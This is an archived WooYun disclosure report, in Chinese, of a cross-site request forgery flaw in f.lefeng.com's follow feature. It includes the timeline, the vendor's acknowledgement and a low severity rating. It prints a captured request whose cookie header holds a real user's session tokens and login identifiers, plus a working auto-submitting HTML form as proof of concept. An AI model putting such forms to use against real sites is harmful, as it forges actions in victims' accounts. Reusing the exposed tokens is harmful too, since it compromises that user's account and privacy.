乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-12-20: 细节已通知厂商并且等待厂商处理中 2014-12-25: 厂商已经确认,细节仅向厂商公开 2015-01-04: 细节向核心白帽子及相关领域专家公开 2015-01-14: 细节向普通白帽子公开 2015-01-24: 细节向实习白帽子公开 2015-02-03: 细节向公众公开
http://f.lefeng.com/问题出现在关注这里这个uid就是需要关注的id
POST /weibo/follow?&u=t&lg=n&uid=49679472 HTTP/1.1Host: f.lefeng.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0Accept: */*Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestReferer: http://f.lefeng.com/u/49679472/fansCookie: WT_FPC=id=200ea5b8ff7756332ec1419002557918:lv=1419047889169:ss=1419046010273:lsv=1419002557918:vs=1:spv=55; __utma=96327937.1116324794.1419003289.1419003289.1419046965.2; __utmz=96327937.1419003289.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); lvm_id=90510774674712620001419002562661; __smoc=4a2dc51917e01bd50252bd4d357e5d0d; Hm_lvt_db93c73698769fe05759abb4a4b36104=1419002565; Hm_lvt_69200f796b23f8fe027c39886c7298db=1419004959,1419005845,1419046010,1419047195; __zpspc=76.1.1419002578.1419003289.8%234%7C%7C%7C%7C%7C%23; countyId=171202; __cart_count__=1; CART_COUNTTIME=1419005867957%2420; OneTimeValuesCookies=__user_type__%240%23__user_totalbuy__%240%23__user_id__%2449669146; lafaso_login_name_as988=15754334072; newGuest=%7B%22state%22%3A8%2C%22id%22%3A%224_55_2772%22%7D; pgv_pvi=8990515200; shipInfo=0; acta=%7B%22actn%22%3A%7B%22500096%22%3A%5B%226720823703263600022%3E19%3E1419003287771%3E6%3E1419003287626%3E124137555940697161%3E1419003147068%22%2C1434555289278%5D%7D%2C%22acti%22%3A%7B%22500096%22%3A%5B%22141900313659848430%22%2C1434555136598%5D%7D%2C%22acts%22%3A%7B%22500096%22%3A%5B%225%22%2C1434555150363%5D%7D%2C%22actmapping%22%3A%7B%220%22%3A%5B1%2C1421595289280%5D%7D%7D; CHANETINFO=93269564257; aid=1200; cid2=505236; cid3=93269564257; LongTimeValuesCookies=__SSO_LOGIN%249a063f830782f35ff46434e014c4b8400b2be3a23c3adcb74c49c49ec31758246b3211d855cfeff6%23__user_id_login_2009%24a4ec0050f18dd61418004458108854bb%23__LOGIN__VIEWINFO__%24157****4072%23__LOGIN%2415754334072%23__user_id__%2449669146; uid=49669146; fxb_auth=1b1caHmH22mLsPx3rvuSmLehVMa%2BWoLBqXDymY3bH2Pnw702ejnMibTFO9f8cZc%2FJ9EaqmLolFRDulrF6hYjE5J2ibmRJnf9guGvU3FNJ9gkjv08%2FB%2FV0HINo%2BQtpHsqRZxZIwuoEUZtk1OmBOcYCI2iOqZzJsNAjntjrwHDYX0fhJB8lQZEbZfuTnwNH6by%2F4gpULP2IZ8DD54; fxb_user_info=%7B%22user_id%22%3A%2249669146%22%2C%22nickname%22%3A%22%5Cu8702%5Cu53cb69146%22%2C%22status%22%3A%221%22%2C%22role%22%3A%221%22%2C%22tags%22%3A%5Bfalse%5D%7D; __utmb=96327937.1.10.1419046965; Hm_lpvt_69200f796b23f8fe027c39886c7298db=1419047195; NTKF_CACHE_DATA=%7B%22uid%22%3Anull%2C%22tid%22%3Anull%2C%22fid%22%3A%221419047196250148%22%2C%22d%22%3A%7B%7D%7D; BIGipServerpool_drb_web=gPcn/VgJSacEXLYY2UV9Brq24c3aQ6A5UlZoc/wRPVYFKd/Vg2ozZwIk2hM40aRajLerB0IHDcgbLjI=; ordercoupon=a4ec0050f18dd61418004458108854bbConnection: keep-alivePragma: no-cacheCache-Control: no-cacheContent-Length: 0
<html><body><form id="demo" name="demo" action="http://f.lefeng.com/weibo/follow?&u=t&lg=n&uid=49679472" method="POST"><input type="submit" value="submit" /></form><script> document.demo.submit();</script></body></html>
危害等级:低
漏洞Rank:5
确认时间:2014-12-25 14:36
谢谢关注乐蜂网,我们尽快修复。
暂无